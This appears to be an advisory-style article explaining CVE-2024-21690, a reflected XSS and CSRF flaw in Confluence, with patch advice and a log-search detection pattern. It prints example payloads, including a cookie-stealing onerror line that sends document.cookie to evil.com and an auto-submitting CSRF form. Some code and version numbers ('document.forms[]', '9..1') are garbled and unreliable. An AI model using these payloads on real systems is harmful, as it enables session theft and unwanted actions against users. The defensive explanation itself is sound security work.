A serious security issue — CVE-2024-21690 — exists in several versions of Atlassian Confluence Data Center and Server. This vulnerability combines Reflected Cross-Site Scripting (XSS) and Cross-Site Request Forgery (CSRF), letting unauthenticated attackers run arbitrary JavaScript/HTML code in a user's browser and perform unwanted actions on their behalf. The vulnerability has a CVSS score of 7.1, making it high severity.
Reflected XSS Component
In Reflected XSS, an attacker lures a victim into clicking a malicious link that contains JavaScript code. This code gets reflected by the server (in this case, Confluence) and executed in the victim's browser, under the context of their authenticated session.
Example Attack Vector
http://confluence.example.com/pages/viewpage.action?pageId=12345&search=<script>alert('XSS')</script>;
If the page fails to properly sanitize the search parameter, the JavaScript runs in the victim's browser.
CSRF Component
CSRF occurs when an attacker tricks a logged-in Confluence user into submitting a request they did not intend. If the user is authenticated, the action runs with their privileges.
Example CSRF Exploit
<form method="POST" action="http://confluence.example.com/some-action">;
<input type="hidden" name="someParam" value="maliciousData">
<input type="submit" value="Submit">
</form>
<script>
document.forms[].submit();
</script>
If a user with an active session visits a malicious site, their browser may submit this hidden request automatically, performing some action inside Confluence.
Exploit Chain
What makes CVE-2024-21690 dangerous is it can be exploited by unauthenticated attackers via a simple phishing email or malicious link, combining XSS to steal session cookies or perform hostile actions, and CSRF to carry out requests invisible to the end-user.
An attacker crafts a URL like
http://confluence.example.com/pages/viewpage.action?pageId=12345&search=<img src=x onerror="fetch('https://evil.com/steal?cookie='+document.cookie)">
Browser executes the onerror JavaScript, sending session details to the attacker.
Or, attacker hosts a page containing a hidden CSRF form exploiting a specific Confluence API endpoint, forcing privilege escalation or data leakage.
For Confluence Data Center and Server 9..x: Upgrade to 9..1 or later
- Or, get the latest version from Atlassian’s Download Center
See the full release details here:
➡️ Confluence Release Notes
Example Detection Pattern (Log Search)
grep '<script>' /var/log/confluence/access.log
More Information
- Atlassian Security Advisory – CVE-2024-21690
- Atlassian Download Center
- What is XSS? (OWASP)
- What is CSRF? (OWASP)
Conclusion
If you run Confluence Data Center or Server, patch now. Attackers can use CVE-2024-21690 to exploit your users and compromise your environment with minimal effort. Simple user interaction — a click on a link or visit to a compromised page — could lead to data theft or unauthorized actions in your organization’s collaboration platform.
Keep your software up to date and educate your team about phishing and malicious links.
This vulnerability was responsibly reported through Atlassian’s Bug Bounty program, but now that it’s public, attackers will move fast. So should you.
*This article is written for educational purposes and does not endorse or encourage unauthorized hacking or exploitation. Always follow your organization’s security and update policies.*
Timeline
Published on: 08/21/2024 16:15:07 UTC
Last modified on: 08/21/2024 17:25:08 UTC